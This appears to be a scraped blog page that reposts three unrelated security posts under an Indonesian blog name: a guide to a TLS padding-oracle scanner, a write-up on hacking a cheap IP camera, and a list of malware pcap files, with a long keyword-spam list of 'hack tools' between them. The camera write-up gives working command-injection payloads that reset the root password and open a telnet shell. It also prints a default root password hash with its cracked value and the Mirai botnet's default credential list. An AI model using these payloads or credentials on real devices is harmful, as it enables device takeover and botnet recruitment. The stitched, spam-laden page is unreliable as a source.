Gambar Kenangan

Gambar Kenangan
Kami yang ceria

Rabu, 31 Mei 2023

Scanning For Padding Oracles

As you might have heard, we recently got our paper on padding oracle attacks accepted to the USENIX Security Conference. In this paper, we describe and evaluate a scanning methodology with which we found several padding oracle vulnerabilities in devices from various vendors. In total, we found that 1.83% of the Alexa Top 1 Million have padding oracle vulnerabilities.

To test whether a server is vulnerable, we specified different padding oracle vectors which we send to the system under test, using different cipher suites and protocol versions. If the server does not behave identically (on both the TLS and TCP layers), we consider it to be vulnerable to a padding oracle attack, since it is leaking information about the plaintext via behavior differences. Depending on the responses to such padding oracle vectors, one can estimate which implementation is responsible for the vulnerability. We contacted quite a few website owners and tried to cooperate with them, to find out which vendors and TLS stacks are responsible for the identified vulnerabilities. You can find our current disclosure status on this issue on https://github.com/RUB-NDS/TLS-Padding-Oracles.
We are currently in contact with other vendors to fix the remaining vulnerabilities, but the some of the rare (in terms of the number of affected hosts) vulnerabilities are currently not attributed. To fix the remaining vulnerabilities, we ask for your assistance to help get rid of this issue. For this purpose, we integrated a standalone version of our padding oracle evaluation tool into our TLS-Scanner (v.2.7) project. This tool allows you (among other things) to evaluate if a specific server is vulnerable.

When the tool detects a vulnerability, it tries to attribute the vulnerability to a specific vendor or CVE. If we already know of the vulnerability of the server you scanned, the tool will print its details. If the tool does not have a description of the vulnerability in its database, it will ask you to notify us about the vulnerable server, such that we can notify the vendor and get the device fixed. To be clear: the tool never sends any data to us - you have the choice of whether to notify us (and what details to include). There is a chance that the tool's attribution is also mistaken, that is, the tool lists a vendor for your host, but you know for sure that you do not use an implementation by this vendor. Please contact us in such cases as well.

How to use the Tool

First, you need to grab hold of the tool. There are 3 ways to get your hands dirty: pre-compiled, self-compiled or Docker. We provide a pre-compiled version of the tool since the compilation process can get quite messy if you are not familiar with java and maven. You can directly download the resulting project here. However, if you also want to play around with the code, you have to compile everything yourself.

Building the TLS-Scanner

For this, you will need (Git), maven (sudo apt-get install maven), OpenJDK-8  (I can guarantee that this version works, other versions might work as well, have not tested it).

You will need to get TLS-Attacker 2.9 (if you do not already have it):
Now we can clone and install the TLS-Scanner

Docker

We also provide a Dockerfile, which lets you run the scanner directly

Getting Started


If you start the TLS-Scanner you should be greeted by a usage info, similar to the one below:

 or


This should give you an overview of the supported command line flags. The only really required one is the -connect flag (similar to OpenSSL and TLS-Attacker), with which you specify which host to scan. The most basic command is therefore:

Your output may look something like this:

By default, TLS-Scanner will run single-threaded. In such cases the scanning will take a while; just how long it will take depends on your server configuration. The scanner also supports multi-threading, which drastically improves the performance. There are two parameters to play around with, -threads, which controls how many different "probes" are executed in parallel, and -aggressive , which controls how many handshakes can be executed simultaneously. If you want the fastest results the following parameters are usually a good choice:

But lets get back to the results of the Scanner. Currently the Scanner supports a bunch of well known tests, like supported ciphersuites or protocol versions. These are very similar to what you may be used to from other scanners like ssllabs or testssl.sh.

Padding Oracles

The main advantage of our scanner is the ability to scan for padding oracle vulnerabilities (which is probably why you are reading this post). You will see if you are vulnerable in the "Attack Vulnerabilities" section. For example, when scanning hackmanit.de, the result is false. Good for us! But as you might have seen there is also another section in the scanner report:"PaddingOracle Responsemap"
This section lists the responses of the scanned host for each padding oracle vector, for each cipher suite and protocol version. For hackmanit.de, there is no detected difference in responses, which means hackmanit.de is not vulnerable to the attack:
If we want, we can also look at the concrete responses of the server. For this purpose, we start the scanner with the -reportDetail flag:

With this flag we now get the following details:

So what does this all mean? First of all, we named our malformed records. The interpretation of those names is visualized in the following table:
BasicMac-<position>-<XOR>   A Record with ApplicationData, MAC and padding bytes, where the padding byte at <position> is XOR'd <XOR>
 MissingMacByteFirst  A Record without ApplicationData, where the first byte of the MAC is missing
 MissingMacByteLast  A Record without ApplicationData, where the last byte of the MAC is missing
 Plain FF  A Record without ApplicationData & MAC which only contains Paddingbytes: 64* 0xFF 
 Plain 3F  A Record without ApplicationData & MAC which only contains Paddingbytes: 64* 0xF3
 InvPadValMac-[<position>]-<appDataLength>-<paddingBytes>  A Record with invalid padding and valid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The Padding is invalid at <position>.
 ValPadInvMac-[<position>]-<appDataLength>-<paddingBytes>  A Record with valid padding and invalid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The MAC is invalid at <position>.
 InvPadInvMac-[<position>]-<appDataLength>-<paddingBytes>  A Record with invalid padding and invalid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The MAC is invalid at the first position. The Padding is invalid at <position>.

Next to the name you can see what the actual response from the server was. Alert messages which are in [] brackets indicate that the alert was a fatal alert while () brackets indicate a warning alert. ENC means that the messages were encrypted (which is not always the case). The last symbol in each line indicates the state of the socket. An X represents a closed socket with a TCP FIN, a T indicates that the socket was still open at the time of measurement and an @ indicates that the socket was closed with an RST. So how did Hackmanit respond? We see a [BAD_RECORD_MAC]  ENC X, which means we received an ENCrypted FATAL BAD_RECORD_MAC alert, and the TCP connection was closed with a TCP FIN. If a server appears to be vulnerable, the scanner will execute the scan a total of three times to confirm the vulnerability. Since this response is identical to all our vectors, we know that the server was not vulnerable and the scanner is not re-executing the workflows.

Here is an example of a vulnerable host:
As you can see, this time the workflows got executed multiple times, and the scanner reports the cipher suite and version as vulnerable because of "SOCKET_STATE". This means that in some cases the socket state revealed information about the plaintext. If you look closely, you can see that for ValPadInvMac-[0]-0-59, ValPadInvMac-[8]-0-59 and ValPadInvMac-[15]-0-59 the server failed to close the TCP socket, while for all other vectors the TCP connect was closed with a TCP FIN. The server was therefore vulnerable.

Since the server was vulnerable, TLS-Scanner will also print an additional section: "PaddingOracle Details"

In this section we try to identify the vulnerability. In the example above, TLS-Scanner will print the following:

As you can see, we attribute this vulnerability to OpenSSL <1.0.2r. We do so by looking at the exact responses to our malformed records. We additionally print two important facts about the vulnerability: Whether it is observable and its strength. The precise details of these properties are beyond the scope of this blogpost, but the short version is:
If an oracle is observable, a man in the middle attacker can see the differences between the vectors by passively observing the traffic, without relying on browser or application specific tricks. A strong oracle has no limitations in the number of consecutive bytes an attacker can decrypt. If an oracle is STRONG and OBSERVABLE, then an attacker can realistically exploit it. This is the case in the example above.
For more details on this, you will have to wait for the paper.

Attribution

As you can see, we try to fingerprint the responsible device/implementation. However, we were not able to identify all vulnerable implementations yet. If we cannot attribute a vulnerability you will receive the following message:

Could not identify the vulnerability. Please contact us if you know which software/hardware is generating this behavior.

If you encounter this message, we do not know yet who is responsible for this padding oracle and would be happy to know which device/vendor is responsible. If you know who is, please contact us so that we can get in contact with the vendor to fix the issue. To reiterate, the tool never sends any data back to us, and it is your choice whether to contact us manually or not.

There are also some cases in which we can identify the vendor, but the vendor has not patched the vulnerability yet. If you encounter such a host, the scanner will tell you that we know the responsible vendor. To prevent abuse, we do not include further details.

Non-Determinism and Errors

In some cases, the scanner is unable to scan for padding oracles and reports ERROR or non-deterministic responses. The ERROR cases appear if the scanner failed could not handshake with the specified cipher suite and protocol version. This might be due to a bug in the tested TLS-Server or a bug in TLS-Attacker or TLS-Scanner. If you think the handshake fails because of an issue on our side, please open an issue on Github, and we will investigate. The more interesting cases are the non-deterministic ones. In such cases the scanner observed non-identical scan results in three separate scans. This can be due to non-determinism in the software, connection errors, server load or non-homogeneous load balancing. Currently, you will have to analyze these cases manually. In the paper, we excluded such hosts from our study because we did not want to artificially improve our results. But we understand that you as a tester want to know if the server is vulnerable or not. If the server is not truly vulnerable you would see the differences between the answers spread across all the different vectors. If the differences only appear on a subset of malformed records the server is very likely vulnerable. If you are unsure, you can also always scan multiple times (or scan slowly), increase the timeout, or if you are entirely lost get in touch with us. 


How YOU can help

Please use the scanner on all your hosts and check for padding oracle vulnerabilities. If the scanner can identify your vulnerability, a patch should already be available. Please patch your system! If the scanner does not identify the vulnerability (and instructs you to contact us), please contact us with the details (robert.merget@rub.de). If you can provide us with the detailed output of the scanner or even better, the name of the host, with the corresponding vendor, we could match the results with our database and help fix the issue. We can already attribute over 90% of the vulnerabilities, but there is still a lot to be discovered. We mostly scanned the Alexa top 1-million on port 443. Other protocols like IMAPS, POP3S, etc. might have different implementations with different vulnerabilities. If you find vulnerabilities with our tool, please give us credit. It helps us to get more funding for our project.

Issues with the Scanner


A notable feature of our scanner is that we do not actively try to avoid intolerances (like not scanning with a lot of cipher suites in the Hello messages etc.). We believe that doing so would hide important bugs. We are currently experimenting with intolerances checks, but the feature is now still in beta. If we cannot scan a server (most of the time due to intolerances or SNI problems), the scanner will report a lot of intolerances and usually no supported protocol versions. Some intolerances may trick the scanner into reporting false results. At the current stage, we cannot make any guarantees. If you are using this tool during a pentest, it might be smart to rescan with other scanners (like the recently released padcheck tool from our colleague Craig Young) to find the ground truth (this is good advice in general, since other mainstream scanners likely have the same issues). Note however that it is very unlikely that the scanner reports a false positive on a padding oracle scan.


Conclusion

There are still a lot of padding oracle vulnerabilities out there - and a lot of them are still unpatched. We hope you will find some bugs with the tool :) Happy H4cking :D


Acknowlegements

This is joint work from Robert Merget (@ic0nz1), Juraj Somorovsky (@jurajsomorovsky),  Nimrod Aviram (@NimrodAviram), Janis Fliegenschmidt (@JanisFliegens), Craig Young (@craigtweets), Jörg Schwenk (@JoergSchwenk) and (Yuval Shavitt).

Related links


Dicatat oleh di

How I Hacked My IP Camera, And Found This Backdoor Account

The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.

Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.

The obvious problems



I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.

It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in 
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

Let's run a quick nmap on this device.
PORT     STATE SERVICE    VERSION 23/tcp   open  telnet     BusyBox telnetd 81/tcp   open  http       GoAhead-Webs httpd | http-auth:  | HTTP/1.1 401 Unauthorized |_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Document Error: Unauthorized 8600/tcp open  tcpwrapped
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

The double-blind command injection

The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)
or cleaning up after URL decode: 
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name $(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters $(ping `cat /tmp/c`)           ;leak it via DNS
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.



But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)
Now, logging in via telnet
(none) login: root Password:  BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. #
Woot woot :) I quickly noticed the root of the command injection problem:

# cat /tmp/ftpupdate.sh /system/system/bin/ftp -n<<! open ftp.site.com 21 user ftpuser $(echo 'root:passwd'|chpasswd) binary mkdir  PSD-111111-REDACT cd PSD-111111-REDACT lcd /tmp put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg close bye

Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. 

root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.



It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.

Last but not least everything is running as root, which is not surprising. 

My hardening list

I added these lines to the end of /system/init/ipcam.sh:
sleep 15 echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
 
 
 You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.
 
 My TODO list
 
 
     
  • Investigate the script /system/system/bin/gmail_thread
    •  
  • Investigate the cloud protocol * - see update 2016 10 27
    •  
  • Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
    •  
 
 A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. 
 
 
 
 And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.
 
 
 
 
 
 
 
 When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.
 
 
 
 If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 
 
 
 
 Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html
 
 
 
 
 
 
 Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.
 
 root     xc3511
 root     vizxv
 root     admin
 admin    admin
 root     888888
 root     xmhdipc
 root     default
 root     juantech
 root     123456
 root     54321
 support  support
 root     (none)
 admin    password
 root     root
 root     12345
 user     user
 admin    (none)
 root     pass
 admin    admin1234
 root     1111
 admin    smcadmin
 admin    1111
 root     666666
 root     password
 root     1234
 root     klv123
 Administrator admin
 service  service
 supervisor supervisor
 guest    guest
 guest    12345
 guest    12345
 admin1   password
 administrator 1234
 666666   666666
 888888   888888
 ubnt     ubnt
 root     klv1234
 root     Zte521
 root     hi3518
 root     jvbzd
 root     anko
 root     zlxx.
 root     7ujMko0vizxv
 root     7ujMko0admin
 root     system
 root     ikwb
 root     dreambox
 root     user
 root     realtek
 root     00000000
 admin    1111111
 admin    1234
 admin    12345
 admin    54321
 admin    123456
 admin    7ujMko0admin
 admin    1234
 admin    pass
 admin    meinsm
 tech     tech
 mother   fucker
 
 
 Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
 Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
 Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
 
 
 
 Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
 which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
 
 Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
 This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
 http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/
 
 
 
 
Continue reading

  1.  Hack Tools For Pc 
  2.  Hack Tools For Mac 
  3.  Hacker Tool Kit 
  4.  Hacking Tools Pc 
  5.  Hacking Tools Windows 10 
  6.  Hack Rom Tools 
  7.  Blackhat Hacker Tools 
  8.  Hack Tools Download 
  9.  Black Hat Hacker Tools 
  10.  Usb Pentest Tools 
  11.  Hacking Tools Hardware 
  12.  Hacker Security Tools 
  13.  Pentest Tools Apk 
  14.  Hack And Tools 
  15.  Physical Pentest Tools 
  16.  Hacking Tools Software 
  17.  Hacker Tools Apk 
  18.  Pentest Reporting Tools 
  19.  Hack Tools Download 
  20.  Hacking Tools Usb 
  21.  Tools 4 Hack 
  22.  Game Hacking 
  23.  Hacking Tools For Windows 
  24.  Hacker Tools Apk Download 
  25.  How To Make Hacking Tools 
  26.  Pentest Tools For Android 
  27.  Tools 4 Hack 
  28.  Hack Tools Pc 
  29.  What Is Hacking Tools 
  30.  Top Pentest Tools 
  31.  How To Install Pentest Tools In Ubuntu 
  32.  Hacking Tools Kit 
  33.  Hacking Tools 2019 
  34.  Pentest Tools For Mac 
  35.  Pentest Tools Review 
  36.  Best Pentesting Tools 2018 
  37.  Hack App 
  38.  Pentest Tools Linux 
  39.  Hacker Tools Software 
  40.  Ethical Hacker Tools 
  41.  Hacking Tools Mac 
  42.  Hacking Apps 
  43.  Pentest Reporting Tools 
  44.  Hacker Tools Hardware 
  45.  Hacker Tools List 
  46.  Hacker Security Tools 
  47.  Hacking App 
  48.  Hacker Tools Apk 
  49.  Hacking Tools Github 
  50.  Nsa Hack Tools Download 
  51.  Hacker Tools Free 
  52.  Pentest Tools Subdomain 
  53.  Hacking Tools And Software 
  54.  Hack Tools 
  55.  Install Pentest Tools Ubuntu 
  56.  Wifi Hacker Tools For Windows 
  57.  Pentest Tools Website Vulnerability 










Dicatat oleh



di





































          

        

          

        

Selasa, 30 Mei 2023


          

        










Collection Of Pcap Files From Malware Analysis











 
 Update: Feb 19. 2015
 
 
 We have been adding pcaps to the collection so remember to check out the folder ( Pcap collection) for the recent pcaps.
 
 I had a project to test some malicious and exploit pcaps and collected a lot of them (almost 1000) from various public sources. You can see them in the PUBLIC folder. The credits go to the authors of the pcaps listed in the name of each file. Please visit their blogs and sites to see more information about the pcaps, see their recent posts, and send them thanks. The public pcaps have no passwords on them.
 
 
 
 
 Update:Dec 13. 2014 
 
 
 
 Despite rare updates of this post, we have been adding pcaps to the collection so remember to check out the folder ( Pcap collection (New link)) for the recent pcaps!
 
 
 
 Update:Dec 31. 2013 - added new pcaps
 
 I did some spring cleaning yesterday and came up with these malware and exploit pcaps. Such pcaps are very useful for IDS and signature testing and development, general education, and malware identification. While there are some online public sandboxes offering pcaps for download like Cuckoo or Anubis but  looking for them is a tedious task and you cannot be totally sure the pcap is for the malware family supposedly analysed - in other words, if the sandbox says it is Zeus does not necessarily mean that it is. 
 
 I found some good pcap repositories here (http://www.netresec.com/?page=PcapFiles) but there are very few pcaps from malware.
 
 These are from identified and verified (to the best of my knowledge and belief - email me if you find errors) malware samples.
 
 All of them show the first stage with the initial callback and most have the DNS requests as well. A few pcaps show extended malware runs (e.g. purplehaze pcap is over 500mb).
 Most pcaps are mine, a few are from online sandboxes, and one is borrowed from malware.dontneedcoffee.com. That said, I can probably find the corresponding samples for all that have MD5 listed if you really need them. Search contagio, some are posted with the samples.
 
 Each file has the following naming convention:
 BIN [RTF, PDF] - the filetype of the dropper used, malware family name, MD5, and year+month of the malware analysis.
 
 I will be adding more pcaps in the future. Please donate your pcaps from identified samples, I am sure many of you have.
 
 Thank you
 
 
 
 
 
 Download
 
 
 
 
 Download all together or separately.
 
 All pcaps archives have the same password (same scheme), email me if you need it. I tried posting it without any passwords and pass infected but they get flagged as malware. Modern AV rips though zips and zips with the pass 'infected' with ease.
 
 
 
 
 APT PCAPS
 
 
 
 
  
     
  1. 2012-12-31 BIN_Xinmic_8761F29AF1AE2D6FACD0AE5F487484A5-pcap
    2.  
  2. 2013-09-08 BIN_TrojanPage_86893886C7CBC7310F7675F4EFDE0A29-pcap
    3.  
  3. 2013-09-08 BIN_Darkcomet_DC98ABBA995771480AECF4769A88756E-pcap
    4.  
  4. 2013-09-02 8202_tbd_ 6D2C12085F0018DAEB9C1A53E53FD4D1-pcap
    5.  
  5. 2013-09-02 BIN_8202_6d2c12085f0018daeb9c1a53e53fd4d1-pcap
    6.  
  6. 2013-09-02 BIN_Vidgrab_6fd868e68037040c94215566852230ab-pcap
    7.  
  7. 2013-09-02 BIN_PlugX_2ff2d518313475a612f095dd863c8aea-pcap
    8.  
  8. 2013-09-02 BIN_Taidoor_46ef9b0f1419e26f2f37d9d3495c499f-pcap
    9.  
  9. 2013-09-02 BIN_Vidgrab_660709324acb88ef11f71782af28a1f0-pcap
    10.  
  10. 2013-09-02 BIN_Gh0st-gif_f4d4076dff760eb92e4ae559c2dc4525-pcap.zip
    11.  
  11. 2013-07-15 BIN_Taleret.E_5328cfcb46ef18ecf7ba0d21a7adc02c.pcap
    12.  
  12. 2013-05-14 BIN_Mediana_0AE47E3261EA0A2DBCE471B28DFFE007_2012-10.pcap
    13.  
  13. 2013-05-14 BIN_Hupigon_8F90057AB244BD8B612CD09F566EAC0C
    14.  
  14. 2013-05-14 BIN_LetsGo_yahoosb_b21ba443726385c11802a8ad731771c0_2011-07-19
    15.  
  15. 2013-05-13 BIN_IXESHE_0F88D9B0D237B5FCDC0F985A548254F2-2013-05-pcap
    16.  
  16. 2013-05-06 BIN_DNSWatch_protux_4F8A44EF66384CCFAB737C8D7ADB4BB8_2012-11-pcap
    17.  
  17. 2013-05-06 BIN_9002_D4ED654BCDA42576FDDFE03361608CAA_2013-01-30-pcap
    18.  
  18. 2013-05-06 BIN_BIN_RssFeeder_68EE5FDA371E4AC48DAD7FCB2C94BAC7-2012-06-pcap (not a common name, see the traffic ssheet http://bit.ly/maltraffic )
    19.  
  19. 2013-04-30 BIN_MSWab_Yayih_FD1BE09E499E8E380424B3835FC973A8_us-pcap
    20.  
  20. 2013-04-29 BIN_LURK_AF4E8D4BE4481D0420CCF1C00792F484_20120-10-pcap
    21.  
  21. 2013-04-29 BIN_XTremeRAT_DAEBFDED736903D234214ED4821EAF99_2013-04-13-pcap
    22.  
  22. BIN_Enfal_Lurid_0fb1b0833f723682346041d72ed112f9_2013-01.pcap
    23.  
  23. BIN_Gh0st_variant-v2010_B1D09374006E20FA795B2E70BF566C6D_2012-08.pcap
    24.  
  24. BIN_Likseput_E019E37F19040059AB5662563F06B609_2012-10.pcap
    25.  
  25. BIN_Nettravler_1f26e5f9b44c28b37b6cd13283838366.pcap
    26.  
  26. BIN_Nettravler_DA5832657877514306EDD211DEF61AFE_2012-10.pcap
    27.  
  27. BIN_Sanny-Daws_338D0B855421867732E05399A2D56670_2012-10.pcap
    28.  
  28. BIN_Sofacy_a2a188cbf74c1be52681f998f8e9b6b5_2012-10.pcap
    29.  
  29. BIN_Taidoor_40D79D1120638688AC7D9497CC819462_2012-10.pcap
    30.  
  30. BIN_TrojanCookies_840BD11343D140916F45223BA05ABACB_2012_01.pcap
    31.  
  31. PDF_CVE-2011-2462_Pdf_2011-12.pcap
    32.  
  32. RTF_Mongall_Dropper_Cve-2012-0158_C6F01A6AD70DA7A554D48BDBF7C7E065_2013-01.pcap
    33.  
  33. OSX_DocksterTrojan.pcap
    34.  
 
 
 CRIMEWARE PCAPS
 
 
 
 
 
 
  
     
  1. 2013-11-12_BIN_ChePro_2A5E5D3C536DA346849750A4B8C8613A-1.pcap
    2.  
  2. 2013-10-15_BIN_cryptolocker_9CBB128E8211A7CD00729C159815CB1C.pcap
    3.  
  3. 2013-09-20_BIN_Lader-dlGameoverZeus_12cfe1caa12991102d79a366d3aa79e9.pcap
    4.  
  4. 2013-09-08 BIN_Tijcont_845B0945D5FE0E0AAA16234DC21484E0-pcap
    5.  
  5. 2013-09-08 BIN_Kelihos_C94DC5C9BB7B99658C275B7337C64B33-pcap.zip
    6.  
  6. 2013-08-19 BIN_Nitedrem_508af8c499102ad2ebc1a83fdbcefecb-pcap
    7.  
  7. 2013-08-17 BIN_sality_CEAF4D9E1F408299144E75D7F29C1810-pcap
    8.  
  8. 2013-08-15 BIN_torpigminiloader-pcap.zip
    9.  
  9. 2013-13-08 EK_popads_109.236.80.170_2013-08-13.pcap
    10.  
  10. 2013-11-08 BIN_Alinav5.3_4C754150639AA3A86CA4D6B6342820BE.pcap
    11.  
  11. 2013-08-08 BIN_BitcoinMiner_F865C199024105A2FFDF5FA98F391D74-pcap
    12.  
  12. 2013-08-07 BIN_ZeroAccess_Sirefef_C2A9CCC8C6A6DF1CA1725F955F991940_2013-08-pcap
    13.  
  13. 2013-07-05 BIN_Kuluoz-Asprox_9F842AD20C50AD1AAB41F20B321BF84B
    14.  
  14. 2013-05-31 Wordpress-Mutopy_Symmi_20A6EBF61243B760DD65F897236B6AD3-2pcap.pcap
    15.  
  15. 2013-05-15 BIN_Zeus_b1551c676a54e9127cd0e7ea283b92cc-2012-04.pcap
    16.  
  16. 2013-05-15 BIN_Gypthoy_3EE49121300384FF3C82EB9A1F06F288-2013-05.pcap
    17.  
  17. 2013-05-12 BIN_PassAlert_B4A1368515C6C39ACEF63A4BC368EDB2-2013-05-13
    18.  
  18. 2013-05-12 BIN_HorstProxy_EFE5529D697174914938F4ABF115F762-2013-05-13-pcap
    19.  
  19. 2013-05-12 BIN_Bitcoinminer_12E717293715939C5196E604591A97DF-2013-05-12-pcap
    20.  
  20. 2013-05-07 BIN_ZeroAccess_Sirefef_29A35124ABEAD63CD8DB2BBB469CBC7A_2013-05-pcapc
    21.  
  21. 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
    22.  
  22. 2013-05-05 BIN_GameThief_ECBA0FEB36F9EF975EE96D1694C8164C_2013-03-pcap
    23.  
  23. 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
    24.  
  24. 2013-04-27 EK_BIN_Blackhole_leadingto_Medfos_0512E73000BCCCE5AFD2E9329972208A_2013-04-pcap
    25.  
  25. 2013-04-26 -- BIN_Citadel_3D6046E1218FB525805E5D8FDC605361-2013-04-samp 
    26.  
  26. BIN_CitadelPacked_2012-05.pcap
    27.  
  27. BIN_CitadelUnpacked_2012-05.pcap
    28.  
  28. BIN_Cutwail_284Fb18Fab33C93Bc69Ce392D08Fd250_2012-10.pcap
    29.  
  29. BIN_Darkmegi_2012-04.pcap
    30.  
  30. BIN_DarknessDDoS_v8g_F03Bc8Dcc090607F38Ffb3A36Ccacf48_2011-01.pcap-
    31.  
  31. BIN_dirtjumper_2011-10.pcap
    32.  
  32. BIN_DNSChanger_2011-12.pcap
    33.  
  33. BIN_Drowor_worm_0f015bb8e2f93fd7076f8d178df2450d_2013-04.pcap
    34.  
  34. BIN_Googledocs_macadocs_2012-12.pcap
    35.  
  35. BIN_Imaut_823e9bab188ad8cb30c14adc7e67066d.pcap
    36.  
  36. BIN_IRCbot_c6716a417f82ccedf0f860b735ac0187_2013-04.pcap
    37.  
  37. BIN_Kelihos_aka_Nap_0feaaa4adc31728e54b006ab9a7e6afa.pcap
    38.  
  38. BIN_LoadMoney_MailRu_dl_4e801b46068b31b82dac65885a58ed9e_2013-04 .pcap
    39.  
  39. BIN_purplehaze-2012-01.pcap
    40.  
  40. BIN_ponyloader_470a6f47de43eff307a02f53db134289.pcap
    41.  
  41. BIN_Ramnitpcap_2012-01.pcap
    42.  
  42. BIN_Reedum_0ca4f93a848cf01348336a8c6ff22daf_2013-03.pcap
    43.  
  43. BIN_SpyEye_2010-02.pcap
    44.  
  44. BIN_Stabuniq_F31B797831B36A4877AA0FD173A7A4A2_2012-12.pcap
    45.  
  45. BIN_Tbot_23AAB9C1C462F3FDFDDD98181E963230_2012-12.pcap
